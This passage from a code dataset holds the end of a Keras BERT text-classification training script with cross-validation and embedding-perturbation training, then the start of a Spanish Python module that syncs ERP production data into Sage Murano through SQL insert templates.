cross-validation\nseed = 2020\nnum_classes = 10\n\nmaxlen = 512\nmax_segment = 2 # 设定的多大segment\nbatch_size = 4\n# batch_size = batch_size_per_replica * strategy.num_replicas_in_sync\ngrad_accum_steps = 64 # 梯度积累,即积累一定梯度后再进行运算\ndrop = 0.2 # dropout\nlr = 2e-5\nepochs = 3\n\n\ndef load_data(df):\n \"\"\" 加载数据 \"\"\"\n D = list()\n for _, row in df.iterrows(): # 按行读取\n text = row['content']\n label = row['label_id']\n D.append((text, int(label)))\n # D = [(text1, label1), (text2, label2), ...]\n return D\n\n\n# 建立分词器\ntokenizer = Tokenizer(dict_path, do_lower_case=True)\n\n\ndef sentence_split(words):\n \"\"\" 句子截断 \"\"\"\n # 此次检测出来文本长度平均在1020 mean:1074.372215 std:1090.884148左右,故取1530\n document_len = len(words) # 文本总长度\n # [0, 510, 1020, 1530, 2040, 2550, 3060, 3570, 4080, 4590]\n # 为文档 按照maxlen 划分后的 索引 位���(没有最后部分的位置,即不足maxlen的那段)\n index = list(range(0, document_len, maxlen-2))\n index.append(document_len) # 加上最后的位置\n\n segments = []\n for i in range(len(index) - 1):\n # 这是标准长度 maxlen-2的文本,因为一个段落太长,所以需要这样截断才能训练\n segment = words[index[i]: index[i + 1]]\n assert len(segment) > 0\n # 转化为id, 并加上 首尾的cls和sep\n segment = tokenizer.tokens_to_ids(['[CLS]'] + segment + ['[SEP]'])\n segments.append(segment)\n\n assert len(segments) > 0\n # 对划分的段进行判断,设定不超过两个,因为Bert输入就是不超过两个\n # 如果超过两个段\n if len(segments) > max_segment:\n segment_ = int(max_segment / 2)\n # 只取开头一段和结尾一段,一共两段,满足max_segment要求\n return segments[:segment_] + segments[-segment_:]\n else:\n return segments\n\n\nclass data_generator(DataGenerator):\n \"\"\" 数据生成器 \"\"\"\n def __init__(self, data, batch_size=32, buffer_size=None, random=False):\n super().__init__(data, batch_size, buffer_size)\n self.random = random\n\n def __iter__(self, random=False):\n batch_token_ids, batch_segment_ids, batch_labels = [], [], []\n for is_end, (text, label) in self.sample(random):\n token_ids = sentence_split(text) # 句子截断\n token_ids = sequence_padding(token_ids, length=maxlen) # padding\n segment_ids = np.zeros_like(token_ids) # 获取与token_ids维度一样的全零数据\n\n batch_token_ids.append(token_ids)\n batch_segment_ids.append(segment_ids)\n batch_labels.append([label])\n\n # 所有的ids 都进行padding\n if len(batch_token_ids) == self.batch_size or is_end:\n batch_token_ids = sequence_padding(\n batch_token_ids, length=max_segment\n )\n batch_segment_ids = sequence_padding(\n batch_segment_ids, length=max_segment\n )\n batch_labels = sequence_padding(batch_labels)\n\n yield [batch_token_ids, batch_segment_ids], batch_labels\n batch_token_ids, batch_segment_ids, batch_labels = [], [], []\n\n def forfit(self):\n while True:\n for d in self.__iter__(self.random):\n yield d\n\n\nclass Attention(Layer):\n \"\"\" 注意力层 \"\"\"\n def __init__(self, hidden_size, **kwargs):\n self.hidden_size = hidden_size\n super().__init__(**kwargs)\n\n def build(self, input_shape):\n initializer = keras.initializers.truncated_normal(mean=0.0, stddev=0.05) # 初始化为正态分布\n # 为该层创建一个可训练的权重\n self.weight = self.add_weight(\n name='weight',\n shape=(self.hidden_size, self.hidden_size),\n initializer=initializer,\n trainable=True\n )\n # 为该层创建一个可训练的权重\n self.bias = self.add_weight(\n name='bias',\n shape=(self.hidden_size,),\n initializer='zero',\n trainable=True\n )\n # 为该层创建一个可训练的权重\n self.query = self.add_weight(\n name='query',\n shape=(self.hidden_size, 1),\n initializer=initializer,\n trainable=True\n )\n\n super().build(input_shape) # 一定要在最后调用它\n\n def call(self, x):\n x, mask = x\n # 因为 self.weight只有两个维度,所以这里要进行维度处理\n mask = K.squeeze(mask, axis=2) # 维度压缩 去掉一个维度 axis=2,但是数据还是不变的\n # linear 线性变化\n # K.dot()进行 点乘,然后加了self.bias\n key = K.bias_add(K.dot(x, self.weight), self.bias)\n\n # compute attention\n outputs = K.squeeze(K.dot(key, self.query), axis=2) # 计算注意力\n outputs -= 1e32 * (1 - mask)\n\n attn_scores = K.softmax(outputs) # 使用 softmax 计算得分\n attn_scores *= mask\n attn_scores = K.reshape(\n attn_scores, shape=(-1, 1, attn_scores.shape[-1])\n )\n\n outputs = K.squeeze(K.batch_dot(attn_scores, key), axis=1)\n\n return outputs\n\n def compute_output_shape(self, input_shape):\n return input_shape[0][0], self.hidden_size\n\n\ndef build_model():\n \"\"\" 模型构建 \"\"\"\n token_ids = Input(shape=(max_segment, maxlen), dtype='int32')\n segment_ids = Input(shape=(max_segment, maxlen), dtype='int32')\n\n input_mask = Masking(mask_value=0)(token_ids) # 对输入token_ids做masking\n # k.any()先归约,然后再进行类型变换\n # 可以转换一个 Keras 变量,但它仍然返回一个 Keras 张量(类型变换)\n input_mask = Lambda(\n lambda x: K.cast(K.any(x, axis=2, keepdims=True), 'float32')\n )(input_mask)\n\n # 重构 维度 把 batch, token_ids 合并成一个维度\n token_ids1 = Lambda(\n lambda x: K.reshape(x, shape=(-1, maxlen))\n )(token_ids)\n segment_ids1 = Lambda(\n lambda x: K.reshape(x, shape=(-1, maxlen))\n )(segment_ids)\n\n # 加载预训练模型\n bert = build_transformer_model(\n config_path=config_path,\n checkpoint_path=checkpoint_path,\n return_keras_model=False,\n )\n output = bert.model([token_ids1, segment_ids1])\n output = Lambda(lambda x: x[:, 0])(output) # 取CLS 只取第一列\n # 维度重构\n output = Lambda(\n lambda x: K.reshape(x, shape=(-1, max_segment, output.shape[-1]))\n )(output)\n output = Multiply()([output, input_mask]) # 把输出和 input_mask拼到一起,然后输出一个张量,维度不变\n output = Dropout(drop)(output)\n\n output = Attention(output.shape[-1].value)([output, input_mask]) # 使用注意力\n output = Dropout(drop)(output)\n # FC 线性层\n output = Dense(\n units=num_classes,\n activation='softmax',\n kernel_initializer=bert.initializer\n )(output)\n\n model = keras.models.Model([token_ids, segment_ids], output)\n # 设置多GPU\n # 设置优化器,优化参数\n optimizer_params = {\n 'learning_rate': lr,\n 'grad_accum_steps': grad_accum_steps\n }\n\n optimizer = extend_with_gradient_accumulation(Adam) # 加入梯度累积\n optimizer = optimizer(**optimizer_params)\n\n # multi gpu\n\n model.compile(\n loss='sparse_categorical_crossentropy',\n optimizer=optimizer,\n metrics=['sparse_categorical_accuracy'],\n )\n\n return model\n\n\ndef adversarial_training(model, embedding_name, epsilon=1.):\n \"\"\" 给模型添加对抗训练\n 其中model是需要添加对抗训练的keras模型,embedding_name\n 则是model里边Embedding层的名字。要在模型compile之后使用。\n \"\"\"\n if model.train_function is None: # 如果还没有训练函数\n model._make_train_function() # 手动make\n old_train_function = model.train_function # 备份旧的训练函数\n\n # 查找Embedding层\n for output in model.outputs:\n embedding_layer = search_layer(output, embedding_name)\n if embedding_layer is not None:\n break\n if embedding_layer is None:\n raise Exception('Embedding layer not found')\n\n # 求Embedding梯度\n embeddings = embedding_layer.embeddings # Embedding矩阵\n gradients = K.gradients(model.total_loss, [embeddings]) # Embedding 梯度\n gradients = K.zeros_like(embeddings) + gradients[0] # 转为 dense tensor\n\n # 封装为函数\n inputs = (\n model._feed_inputs + model._feed_targets + model._feed_sample_weights\n ) # 所有输入层\n\n embedding_gradients = K.function(\n inputs=inputs,\n outputs=[gradients],\n name='embedding_gradients',\n ) # 封装为函数\n\n def train_function(inputs): # 重新定义训练函数\n grads = embedding_gradients(inputs)[0] # Embedding梯度\n delta = epsilon * grads / (np.sqrt((grads**2).sum()) + 1e-8) # 计算扰动\n K.set_value(embeddings, K.eval(embeddings) + delta) # 注入扰动\n outputs = old_train_function(inputs) # 梯度下降\n K.set_value(embeddings, K.eval(embeddings) - delta) # 删除扰动\n return outputs\n\n model.train_function = train_function # 覆盖原训练函数\n\n\nclass Evaluator(Callback):\n def __init__(self, valid_generator):\n super().__init__()\n self.valid_generator = valid_generator # 验证集数据生成器\n self.best_val_f1 = 0.\n\n def evaluate(self):\n y_true, y_pred = list(), list()\n for x, y in self.valid_generator:\n y_true.append(y) # 真实结果\n y_pred.append(self.model.predict(x).argmax(axis=1)) # 预测结果\n y_true = np.concatenate(y_true) # 所有结果拼接在一起\n y_pred = np.concatenate(y_pred) # 所有结果拼接在一起\n f1 = f1_score(y_true, y_pred, average='macro') # 计算f1值\n return f1\n\n def on_epoch_end(self, epoch, logs=None): # 每个epoch结束时,都会执行这个\n val_f1 = self.evaluate() # 获取f1\n if val_f1 > self.best_val_f1: # 如果这轮epoch的f1 比历史最佳的f1高,就替换掉\n self.best_val_f1 = val_f1\n logs['val_f1'] = val_f1\n print(f'val_f1: {val_f1:.5f}, best_val_f1: {self.best_val_f1:.5f}')\n\n\n# 执行训练\ndef do_train(df_train):\n # n 折\n skf = StratifiedKFold(n_splits=n, random_state=seed, shuffle=True) # 设置 n折\n # skf.split(df_train['text'], df_train['label']) 划分数据,生成 train, valid数据\n # enumerate(data, 1) 表示下标从1开始,即 fold从1开始计算\n for fold, (train_idx, valid_idx) in enumerate(skf.split(df_train['content'], df_train['label_id']), 1):\n print(f'Fold {fold}')\n # 加载数据\n train_data = load_data(df_train.iloc[train_idx])\n valid_data = load_data(df_train.iloc[valid_idx])\n # 加入数据迭代器中\n train_generator = data_generator(train_data, batch_size, random=True)\n valid_generator = data_generator(valid_data, batch_size)\n\n model = build_model() # 构建模型\n # strategy = tf.distribute.MirroredStrategy()\n # print('Number of devices: %d' % strategy.num_replicas_in_sync) # 输出设备数量\n # with strategy.scope():\n # model = build_model()\n # model.summary()\n\n # 加入对抗训练\n adversarial_training(model, 'Embedding-Token', 0.5) # 加入对抗训练\n # 回调函数\n callbacks = [\n Evaluator(valid_generator), # 每个epoch结束时,就会执行验证\n EarlyStopping(\n monitor='val_f1',\n patience=5,\n verbose=1,\n mode='max'), # 早期停止条件,监控val_f1值,如果5次都没有超过最佳f1,那么就停止训练\n ReduceLROnPlateau(\n monitor='val_f1',\n factor=0.5,\n patience=2,\n verbose=1,\n mode='max'), # 当训练的模型停止提升的时候,就减少学习率,看是否能够继续提升\n ModelCheckpoint(\n f'weights-{fold}.h5', # 保存路径 避免文件名被覆盖\n monitor='val_f1',\n save_weights_only=True,\n save_best_only=True,\n verbose=1,\n mode='max'), # 模型检查点,进行模型的数据进行保存;只保存最新f1的那次数据,只保存权重\n ]\n # 模型训练\n model.fit_generator(\n train_generator.forfit(),\n steps_per_epoch=len(train_generator),\n epochs=epochs,\n callbacks=callbacks,\n validation_data=valid_generator.forfit(),\n validation_steps=len(valid_generator)\n )\n\n del model # 删除模型\n K.clear_session() # 清理 会话\n\n\nif __name__ == '__main__':\n df_train = pd.read_csv('dataset/all_label_id_data.csv', encoding='utf-8')\n df_train['content'] = df_train['content'].apply(lambda x: x.strip().split())\n\n do_train(df_train)\n","repo_name":"xhjcxxl/ccf2020_classification","sub_path":"keras_model/train_classification.py","file_name":"train_classification.py","file_ext":"py","file_size_in_byte":14366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9811113701","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nOperaciones.\n\n\"\"\"\n\n# TODO: No sincroniza el campo que indica que el geotextil es C en los\n# productos de venta de tipo Geotextil.\n\n# pylint: disable=too-many-lines, wrong-import-position\n# pylint: relative-import\n\nfrom __future__ import print_function\nimport os\nimport sys\nimport time\nimport logging\nfrom collections import defaultdict, namedtuple\nfrom tempfile import gettempdir\n\nNOMFLOG = \".\".join(os.path.basename(__file__).split(\".\")[:-1])\ntry:\n logging.basicConfig(filename=\"%s.log\" % (NOMFLOG),\n format=\"%(asctime)s %(levelname)-8s : %(message)s\",\n level=logging.DEBUG)\n# pylint:disable=bare-except\nexcept: # Error de permisos. Fallback a temporal # noqa\n NOMFLOG = os.path.join(gettempdir(), \"ops.tmp\")\n logging.basicConfig(filename=\"{}{}.log\".format(NOMFLOG, time.time()),\n format=\"%(asctime)s %(levelname)-8s : %(message)s\",\n level=logging.DEBUG)\n\nimport datetime # noqa\nfrom connection import Connection, DEBUG, VERBOSE, CODEMPRESA, CANALES # noqa\nfrom connection import FABRICACION, ENTRADA, SALIDA, INVENTARIO, VENTA # noqa\nfrom export import determinar_familia_murano # noqa\nfrom extra import get_peso_bruto, get_peso_neto, get_superficie # noqa\nfrom extra import AttrDict # noqa\n\ntry:\n import win32com.client\nexcept ImportError:\n LCOEM = False\nelse:\n LCOEM = True\n\nRUTA_GINN = os.path.abspath(os.path.join(\n os.path.dirname(__file__), \"..\", \"..\", \"..\", \"ginn\"))\nsys.path.append(RUTA_GINN)\nfrom framework import pclases # pylint: disable=import-error # noqa\n\n\n# DocumentoUnico a «No» para evitar error con decimales.\nSQL_STOCK = \"\"\"INSERT INTO [%s].[dbo].[TmpIME_MovimientoStock](\n CodigoEmpresa,\n Ejercicio,\n Periodo,\n Fecha,\n Serie,\n Documento,\n CodigoArticulo,\n CodigoAlmacen,\n -- AlmacenContrapartida,\n Partida,\n -- Partida2_,\n -- CodigoColor_,\n GrupoTalla_,\n CodigoTalla01_,\n TipoMovimiento,\n Unidades,\n UnidadMedida1_,\n Precio,\n Importe,\n Unidades2_,\n UnidadMedida2_,\n FactorConversion_,\n Comentario,\n CodigoCanal,\n -- CodigoCliente,\n -- CodigoProveedor,\n -- FechaCaduca,\n Ubicacion,\n OrigenMovimiento,\n -- EmpresaOrigen,\n -- MovOrigen,\n -- EjercicioDocumento,\n NumeroSerieLc,\n IdProcesoIME,\n -- MovIdentificadorIME,\n StatusTraspasadoIME,\n TipoImportacionIME,\n DocumentoUnico,\n -- FechaRegistro,\n MovPosicion\n )\n VALUES (\n %d, -- código empresa\n %d, -- ejercicio\n %d, -- periodo\n '%s', -- fecha\n '%s', -- serie ('FAB'|'API')\n %d, -- documento\n '%s', -- codigo_articulo\n '%s', -- codigo_almacen\n -- '',\n '%s', -- partida\n -- NULL,\n -- NULL,\n %d, -- grupo_talla\n '%s', -- codigo_talla\n %d, -- tipo_movimiento\n %f, -- unidades en la unidad de medida específica (m², kg)\n '%s', -- unidad de medida específica\n %f, -- precio\n %f, -- importe\n %f, -- unidades2 = unidades * factor de conversion | fc!=0\n '%s', -- UnidadMedida2_ (la básica: ROLLO, BALA...)\n %f, -- factor de conversión\n '%s', -- comentario\n '%s', -- Canal. Antes DIV para evitar un bug de Murano.\n -- NULL,\n -- NULL,\n -- NULL,\n '%s', -- ubicación\n '%s', -- origen movimiento\n -- NULL,\n -- NULL,\n -- NULL,\n '%s', -- NumeroSerieLc\n '%s', -- IdProcesoIME\n -- NULL,\n 0,\n 0,\n 0,\n -- NULL,\n '%s' -- GUID MovPosicion\n );\"\"\" # NOQA\n\nSQL_SERIE = \"\"\"INSERT INTO [%s].[dbo].[TmpIME_MovimientoSerie](\n CodigoEmpresa,\n CodigoArticulo,\n NumeroSerieLc,\n Fecha,\n OrigenDocumento,\n EjercicioDocumento,\n SerieDocumento,\n Documento,\n MovPosicionOrigen,\n -- CodigoColor_,\n CodigoTalla01_,\n CodigoAlmacen,\n Ubicacion,\n Partida,\n UnidadMedida1_,\n UnidadesSerie,\n -- NumeroSerieFabricante,\n -- EmpresaOrigen,\n -- CodigoCliente,\n -- CodigoProveedor,\n Comentario,\n IdProcesoIME,\n --MovIdentificadorIME,\n StatusTraspasadoIME,\n TipoImportacionIME,\n PesoBruto_,\n PesoNeto_,\n MetrosCuadrados,\n CodigoPale)\n VALUES (\n %d, -- código empresa\n '%s', -- código artículo\n '%s', -- número de serie del artículo\n '%s', -- fecha\n %d, -- origen documento\n %d, -- ejercicio\n '%s', -- serie ('FAB'|'API')\n %d, -- documento\n '%s', -- mov. posición origen\n -- NULL,\n '%s', -- código talla\n '%s', -- código almacén\n '%s', -- ubicación\n '%s', -- partida\n '%s', -- unidad de medida básica (ROLLO, BALA...)\n -- NO la específica (kg, m²)\n 1,\n -- NULL,\n -- NULL,\n -- NULL,\n -- NULL,\n '%s', -- comentario\n '%s', -- ID proceso IME\n -- NULL,\n 0,\n 0,\n %f, -- peso bruto\n %f, -- peso neto\n %s, -- metros cuadrados\n '%s' -- código de palé\n );\"\"\"\n\n\ndef buscar_grupo_talla(producto_venta):\n \"\"\"\n Devuelve el código de grupo de tallas (calidades) que puede tener el\n producto.\n \"\"\"\n # Hemos varios grupos de talla: 1 para A, B y C, 2 para A, B (sin C), etc.\n grupo_talla = 0 # Sin grupo de talla\n # res = consultar_producto(nombre = productoVenta.descripcion)\n res = consultar_producto(producto_venta)\n try:\n grupo_talla = res[0]['GrupoTalla_']\n except TypeError as exception:\n strlog = \"(EE)[T] %s no se encuentra en Murano.\" % (\n producto_venta.descripcion)\n print(strlog)\n logging.error(strlog)\n if not DEBUG:\n raise exception\n grupo_talla = 0\n return grupo_talla\n\n\n# pylint: disable=too-many-branches\ndef buscar_unidad_medida_basica(producto, articulo=None):\n \"\"\"\n Devuelve la unidad de medida básica de la ficha de murano para el\n producto indicado. Devuelve \"\" si el producto no lleva tratamiento de\n serie, porque en ese caso el registro de movimiento de stock solo debe\n llevar una unidad. Y esta función se usa para determinar la segunda.\n\n ***\n\n OBSOLETO:\n ---------\n Devuelve la unidad de medida básica según el tipo de producto en ginn.\n Si el producto es un producto de compra o de venta pero sin trazabilidad\n (como ocurre con la granza reciclada, por ejemplo), devuelve la cadena\n vacía como unidad2, ya que en esos movimientos -Sage dixit- el campo\n UnidadMedida2_ debe quedar vacío.\n Si se especifica un artículo, la unidad de éste (BALA, ROLLO, BIGBAG...)\n prevalece sobre la general del producto. Útil para productos que pueden\n empaquetarse tanto en balas como en bigbags.\n \"\"\"\n # Al principio me dijo Félix que la buscara en Murano, pero no lo hago por\n # dos motivos:\n # 1.- Puede que la unidad básica en mirano sea la BALA pero estemos\n # mandando un BIGBAG de ese producto.\n # 2.- Por optimización. Cada consulta al MS-SQLServer tarda más que\n # cualquier operación compleja contra PostgreSQL. Y CONSUME LICENCIA.\n unidad2 = \"\"\n if articulo:\n if articulo.es_bala():\n unidad2 = \"BALA\"\n elif articulo.es_bala_cable():\n unidad2 = \"BALA\"\n elif articulo.es_rollo():\n unidad2 = \"ROLLO\"\n elif articulo.es_rollo_defectuoso():\n unidad2 = \"ROLLO\"\n elif articulo.es_rollo_c():\n unidad2 = \"ROLLO\"\n elif articulo.es_bigbag():\n unidad2 = \"BIGBAG\"\n elif articulo.es_caja():\n unidad2 = \"CAJA\"\n if not unidad2: # Si no artículo o por artículo no se encontró nada.\n if isinstance(producto, pclases.ProductoVenta):\n if producto.es_bala() or producto.es_bala_cable():\n unidad2 = \"BALA\"\n elif producto.es_rollo() or producto.es_rollo_c():\n unidad2 = \"ROLLO\"\n elif producto.es_bigbag():\n unidad2 = \"BIGBAG\"\n elif producto.es_caja() or producto.es_bolsa():\n unidad2 = \"CAJA\"\n else:\n # es_especial, es_granza o algo así. No lleva unidad2 en Murano\n strlog = \"(EE)[U] UnidadMedida2_ para «%s» (%s) indeterminada\"\\\n \".\" % (producto.descripcion, producto.puid)\n logging.error(strlog)\n unidad2 = \"\"\n # raise ValueError, strlog\n else: # Es producto de compra. La unidad2 no debe informarse.\n unidad2 = \"\"\n return unidad2\n\n\n# pylint: disable=invalid-name\ndef buscar_unidad_medida_basica_murano(producto):\n \"\"\"\n Devuelve la unidad de medida básica de la ficha del producto.\n \"\"\"\n res = consultar_producto(producto)\n try:\n unidad2 = res[0]['UnidadMedida2_']\n except TypeError as exception:\n strlog = \"(EE)[U] UnidadMedida2_ para %s no se encuentra en Murano\"\\\n \".\" % (producto.descripcion)\n print(strlog)\n logging.error(strlog)\n if not DEBUG:\n raise exception\n unidad2 = \"ROLLO|BALA|BIGBAG|CAJA\"\n return unidad2\n\n\ndef buscar_marcado_ce(producto):\n \"\"\"\n Devuelve los valores de marcado CE para el producto recibido.\n Se devuelve como un diccionario de nombre de campo y valor.\n \"\"\"\n id_murano = buscar_codigo_producto(producto)\n if not id_murano:\n strerror = \"El producto [{}] {} no existe en Murano.\".format(\n producto.puid, producto.descripcion)\n logging.error(strerror)\n res = None\n else:\n c = Connection() # pylint: disable=no-value-for-parameter\n try:\n # pylint: disable=no-member\n sql = \"SELECT * FROM %s.dbo.GEO_ArticulosMarcado\"\\\n \" WHERE \" % (c.get_database())\n where = r\"CodigoArticulo = '%s';\" % (id_murano)\n sql += where\n res = c.run_sql(sql)\n record = res[0] # NOQA\n except IndexError:\n strerror = \"El producto [{}] {} no tiene registro de marcado en \"\\\n \"Murano.\".format(producto.puid, producto.descripcion)\n res = None\n else:\n res = desmuranize_valor(record)\n return res\n\n\ndef desmuranize_valor(record):\n \"\"\"\n Al objeto recibido le convierte los nombres de los atributos al\n equivalente en ginn.\n \"\"\"\n record_murano = {}\n for clave in record.keys():\n if clave not in (\"CodigoEmpresa\", \"CodigoArticulo\"):\n clave_ginn = field_murano2ginn(clave)\n if \".\" in clave_ginn: # tabla_realcionada.campo. Me quedo solo\n # con el campo.\n clave_ginn = clave_ginn.split(\".\")[-1]\n record_murano[clave_ginn] = record[clave]\n RecordMurano = namedtuple('RecordMurano', record_murano.keys())\n res = RecordMurano(**record_murano)\n return res\n\n\ndef field_murano2ginn(campo):\n \"\"\"\n Devuelve el nombre del campo equivalente en productos de ginn al de Murano\n recibido. Si no tiene equivalencia devuelve None.\n Devuelve el nombre_de_la_tabla.campo. Si el campo en la tabla de Murano se\n puede corresponder con varios de ginn, se devuelve así:\n nombre_tabla1/nombre_tabla2.campo_ginn\n (el campo_ginn se supone que se llama igual en las dos tablas)\n SHOW ME THE CODE!\n \"\"\"\n # De momento solo lo necesito para los campos de Marcado CE.\n switcher = {\n 'GEO_est_por_gramaje': 'camposEspecificosRollo.estandarPruebaGramaje',\n 'GEO_est_pr_alar_long':\n 'camposEspecificosRollo.estandarPruebaAlargamientoLongitudinal',\n 'GEO_est_pr_alar_trans':\n 'camposEspecificosRollo.estandarPruebaAlargamientoTransversal',\n 'GEO_est_pr_compresion':\n 'camposEspecificosRollo.estandarPruebaCompresion',\n 'GEO_est_pr_espesor': 'camposEspecificosRollo.estandarPruebaEspesor',\n 'GEO_est_pr_long': 'camposEspecificosRollo.estandarPruebaLongitudinal',\n 'GEO_est_pr_perforacion':\n 'camposEspecificosRollo.estandarPruebaPerforacion',\n 'GEO_est_pr_permeabilidad':\n 'camposEspecificosRollo.estandarPruebaPermeabilidad',\n 'GEO_est_pr_piramidal':\n 'camposEspecificosRollo.estandarPruebaPiramidal',\n 'GEO_est_pr_poros': 'camposEspecificosRollo.estandarPruebaPoros',\n 'GEO_est_pr_trans': 'camposEspecificosRollo.estandarPruebaTransversal',\n 'GEO_tol_por_gramaje':\n 'camposEspecificosRollo.toleranciaPruebaGramaje',\n 'GEO_tol_por_gramaje_sup':\n 'camposEspecificosRollo.toleranciaPruebaGramajeSup',\n 'GEO_tot_pr_alar_long':\n 'camposEspecificosRollo.toleranciaPruebaAlargamientoLongitudinal',\n 'GEO_tot_pr_alar_long_sup':\n 'toleranciaPruebaAlargamientoLongitudinalSup',\n 'GEO_tot_pr_alar_trans':\n 'camposEspecificosRollo.toleranciaPruebaAlargamientoTransversal',\n 'GEO_tot_pr_alar_trans_sup':\n 'toleranciaPruebaAlargamientoTransversalSup',\n 'GEO_tot_pr_compresion':\n 'camposEspecificosRollo.toleranciaPruebaCompresion',\n 'GEO_tot_pr_compresion_sup':\n 'camposEspecificosRollo.toleranciaPruebaCompresionSup',\n 'GEO_tot_pr_espesor': 'camposEspecificosRollo.toleranciaPruebaEspesor',\n 'GEO_tot_pr_espesor_sup':\n 'camposEspecificosRollo.toleranciaPruebaEspesorSup',\n 'GEO_tot_pr_long':\n 'camposEspecificosRollo.toleranciaPruebaLongitudinal',\n 'GEO_tot_pr_long_sup':\n 'camposEspecificosRollo.toleranciaPruebaLongitudinalSup',\n 'GEO_tot_pr_perforacion':\n 'camposEspecificosRollo.toleranciaPruebaPerforacion',\n 'GEO_tot_pr_perforacion_sup':\n 'camposEspecificosRollo.toleranciaPruebaPerforacionSup',\n 'GEO_tot_pr_permeabilidad':\n 'camposEspecificosRollo.toleranciaPruebaPermeabilidad',\n 'GEO_tot_pr_permeabilidad_sup':\n 'camposEspecificosRollo.toleranciaPruebaPermeabilidadSup',\n 'GEO_tot_pr_piramidal':\n 'camposEspecificosRollo.toleranciaPruebaPiramidal',\n 'GEO_tot_pr_piramidal_sup':\n 'camposEspecificosRollo.toleranciaPruebaPiramidalSup',\n 'GEO_tot_pr_poros': 'camposEspecificosRollo.toleranciaPruebaPoros',\n 'GEO_tot_pr_poros_sup':\n 'camposEspecificosRollo.toleranciaPruebaPorosSup',\n 'GEO_tot_pr_trans':\n 'camposEspecificosRollo.toleranciaPruebaTransversal',\n 'GEO_tot_pr_trans_sup':\n 'camposEspecificosRollo.toleranciaPruebaTransversalSup',\n # -- Campos generales en común. Algunos son funciones que reciben el\n # valor de Murano y devuelvel el correspondiente en ginn\n 'DescripcionLinea': _get_linea_produccion_ginn,\n 'DescripcionArticulo': 'nombre',\n 'Descripcion2Articulo': 'descripcion',\n 'CodigoAlternativo': 'codigo',\n 'StockMinimo': 'minimo',\n 'PrecioVenta': 'preciopordefecto',\n 'CodigoArancelario': 'arancel',\n 'GEO_ProdEstandar': 'prodestandar',\n 'GEO_anno_certificacion': 'annoCertificacion',\n 'GEO_Dni': 'dni',\n 'GEO_Usi': _get_uso_ginn,\n 'ObsoletoLc': 'obsoleto',\n # -- Campos específicos de rollos\n 'GEO_gramos': 'camposEspecificosRollo.gramos',\n 'GEO_rollos_por_camion': 'camposEspecificosRollo.rollosPorCamion',\n 'GEO_Modelo_etiqueta_id': _get_modelo_etiqueta_ginn,\n # 'camposEspecificosRollo.modeloEtiquetaID',\n 'GEO_Diametro': 'camposEspecificosRollo.diametro',\n 'GEO_Ficha_fabricacion': 'camposEspecificosRollo.fichaFabricacion',\n 'MarcaProducto': 'camposEspecificosRollo.codigoComposan',\n 'GEO_ancho': 'camposEspecificosRollo.ancho',\n 'GEO_metros_lineales': 'camposEspecificosRollo.metrosLineales',\n 'GEO_calidad_C': 'camposEspecificosRollo.c',\n 'GEO_peso_embalaje': 'camposEspecificosRollo.pesoEmbalaje',\n 'GEO_Cliente_id':\n 'camposEspecificosRollo/camposEspecificosBala.clienteID',\n # Campos específicos de fibra:\n 'GEO_Consumo_granza': 'camposEspecificosBala.consumoGranza',\n 'GEO_Tipo_Material_bala_id': _get_tipo_material_bala_ginn,\n 'GEO_bolsas_Caja': 'camposEspecificosBala.bolsasCaja',\n 'GEO_gramos_bolsa': 'camposEspecificosBala.gramosBolsa',\n 'GEO_Reciclada': 'camposEspecificosBala.reciclada',\n 'GEO_Color': 'camposEspecificosBala.color',\n 'GEO_Cajas_pale': 'camposEspecificosBala.cajasPale',\n # 'GEO_Cliente_id': 'camposEspecificosBala.clienteID', # DUPE\n 'GEO_Dtex': 'camposEspecificosBala.dtex',\n 'GEO_Corte': 'camposEspecificosBala.corte',\n 'GEO_antiuvi': 'camposEspecificosBala.antiuv',\n }\n return switcher.get(campo, None)\n\n\ndef _get_tipo_material_bala_ginn(codigo_murano):\n \"\"\"\n Devuelve el ID del tipo de material de fibra según el código recibido\n de Murano:\n - '': None\n - 'PR': 1 (Polipropileno)\n - 'LI': 2 (Poliéster)\n \"\"\"\n # HARCODED\n if codigo_murano == 'PR':\n # Por error en Sage, lo teclearon como Prolipopileno\n res = 1\n elif codigo_murano == 'LI':\n res = 2\n else:\n res = None\n if res:\n res = pclases.TipoMaterialBala.get(res)\n return res\n\n\ndef _get_modelo_etiqueta_ginn(id_etiqueta_murano):\n \"\"\"\n Devuelve el ID del modelo de la etiqueta en ginn correspondiente al ID\n de Murano para ese mismo modelo recibido.\n Si no lo encuentra o no está establecido en Murano (0), devuelve None.\n \"\"\"\n # TODO: Debería mirar los campos módulo y función de Murano y dejar todo\n # este lío de mantener las tablas con ID idéntico entre ambos programas.\n # Ya en Murano tienen una tabla con (id, nombre, modelo, función). Esta\n # función debe convertirse en un \"sincronizar\" las dos tablas o bien\n # sincronizar el registro en cuestión trayéndose modelo y función. Quizás\n # lo primero. Tengo que \"echarle una pensada\".\n if id_etiqueta_murano == 4:\n # Normativa julio 2013\n res = 4\n elif id_etiqueta_murano in range(1, 99): # Hasta 99 modelos. Cambiable.\n # Resulta que el ID coincide en ambas bases de datos.\n res = id_etiqueta_murano\n else: # Incluido el 0, que es el equivalente al None en Murano\n res = None\n if res:\n res = pclases.ModeloEtiqueta.get(res)\n else:\n # Valor por defecto\n res = pclases.ModeloEtiqueta.get_default()\n return res\n\n\ndef _get_uso_ginn(codigo_uso):\n \"\"\"\n Si recibe, devuelve:\n - DP: Drenaje, filtración, refuerzo, separación, protección\n - DS: Drenaje, filtración, refuerzo, separación\n - FP: Fibra de polipropileno virgen embolsada en papel hidrosoluble para\n su uso como aditivo del hormigón\n - FV: Fibra de polipropileno virgen\n - FS: Filtración, separación\n - FR: Filtración, separación, protección\n - '': ''\n Resto: None\n \"\"\"\n if codigo_uso == 'DP':\n res = \"Drenaje, filtración, refuerzo, separación, protección\"\n elif codigo_uso == 'DS':\n res = \"Drenaje, filtración, refuerzo, separación\"\n elif codigo_uso == 'FP':\n res = \"Fibra de polipropileno virgen embolsada en papel hidrosoluble\"\\\n \" para su uso como aditivo del hormigón\"\n elif codigo_uso == 'FV':\n res = \"Fibra de polipropileno virgen\"\n elif codigo_uso == 'FS':\n res = \"Filtración, separación\"\n elif codigo_uso == 'FR':\n res = \"Filtración, separación, protección\"\n elif codigo_uso == '':\n res = \"\"\n else:\n res = None\n return res\n\n\ndef _get_linea_produccion_ginn(descripcion_linea):\n \"\"\"\n Devuelve el registro de ginn que se corresponde con la descripción de la\n línea de producción de Murano recibida.\n \"\"\"\n try:\n linea = 